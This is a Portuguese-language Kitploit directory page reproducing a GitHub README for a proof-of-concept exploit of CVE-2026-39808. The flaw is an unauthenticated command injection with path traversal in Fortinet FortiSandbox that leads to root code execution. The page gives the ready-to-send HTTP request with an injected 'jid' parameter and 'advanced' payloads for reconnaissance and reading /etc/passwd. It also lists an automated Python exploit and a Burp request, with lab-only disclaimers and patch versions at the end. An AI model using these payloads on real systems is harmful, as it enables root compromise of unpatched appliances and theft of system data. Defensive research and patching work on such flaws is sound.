Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39808 — CVE-2026-39808 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-39808
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHub0xblackash/cve-2026-39808

CVE-2026-39808

CVE-2026-39808

Ver Repositório
224há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Escape de Sandbox Root do FortiSandbox - CVE-2026-39808

1765359501378
Status CVE Affected Versions

🎯 Visão Geral

Este repositório contém uma Prova de Conceito limpa e bem documentada para CVE-2026-39808 — uma vulnerabilidade crítica de injeção de comandos não autenticada no Fortinet FortiSandbox que permite escape de sandbox e execução remota de código como root (uid=0).

O que este PoC demonstra:

  • Path Traversal + Injeção de Comandos via o parâmetro jid
  • Escape da sandbox do ambiente de análise
  • Execução de comandos arbitrários com privilégios de root
  • Leitura de arquivos do sistema e informações de rede

📸 Demonstração

Baixar ferramenta
CVE-2026-39808 1
CVE-2026-39808 0
CVE-2026-39808 3
CVE-2026-39808 2
CVE-2026-39808 4

Exploração bem-sucedida exibindo uid=0 gid=0 groups=0


🚀 Versões Afetadas

Faixa de VersãoStatus
FortiSandbox 4.4.0 – 4.4.8Vulnerável
FortiSandbox 5.0.0 – 5.0.5Vulnerável
4.4.9+ / 5.0.6+Corrigida

🛠️ Como Usar (Somente Lab)

1. Payload Simples (Recomendado)

root@kitploit:~
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip

2. Veja o resultado

Abra no navegador:

root@kitploit:~
https://your-lab-ip/ng/out.txt

3. Exemplos Avançados de Payload

root@kitploit:~
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|

📁 Conteúdo do Repositório

  • poc.py → Exploit automatizado em Python
  • burp-request.txt → Requisição do Burp Suite pronta para uso
  • payloads.md → Coleção de payloads úteis
  • screenshots/ → Imagens da exploração passo a passo
  • README.md → Este arquivo

⚠️ Notas Importantes

  • Somente para fins educacionais e de laboratório
  • NÃO use isto em sistemas de produção ou não autorizados
  • Sempre obtenha permissão adequada antes de testar
  • Atualize seu FortiSandbox para a versão 4.4.9+ ou 5.0.6+

🛡️ Mitigação

Atualize o FortiSandbox imediatamente para uma das seguintes versões:

  • 4.4.9 ou superior
  • 5.0.6 ou superior

A Fortinet lançou patches oficiais que corrigem esta vulnerabilidade.


Feito para Fins de Pesquisa e Aprendizado
⭐ Dê uma estrela neste repositório se ele ajudou você!